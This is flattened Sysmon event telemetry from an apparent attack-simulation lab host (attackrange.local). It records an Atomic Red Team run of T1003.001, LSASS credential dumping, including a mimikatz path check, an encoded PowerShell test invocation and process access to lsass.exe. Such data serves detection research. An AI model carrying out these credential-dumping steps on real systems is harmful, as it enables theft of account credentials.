15:52:52.221{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004424Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.221{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004423Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.221{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004422Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.221{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004421Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.221{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CD4-5FA1-DD00-000000008801}4412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004420Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.221{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD4-5FA1-DD00-000000008801}4412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004419Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.233{D28789B6-7CD4-5FA1-DD00-000000008801}4412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004418Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.080{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD4-5FA1-DC00-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004417Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.080{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CD4-5FA1-DC00-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004416Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.033{D28789B6-7CD4-5FA1-DC00-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_s0evuzbz.upi.ps12020-11-03 15:52:52.033 10341000x80000000000000004415Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.033{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CD4-5FA1-DC00-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004414Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.002{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD4-5FA1-DC00-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004413Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.002{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD4-5FA1-DC00-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004412Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.002{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004411Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.002{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004410Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.002{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004409Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.002{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004408Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.002{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004407Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.002{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004406Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.002{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004405Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.002{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004404Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.002{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004403Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.002{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CD4-5FA1-DC00-000000008801}4944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004402Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 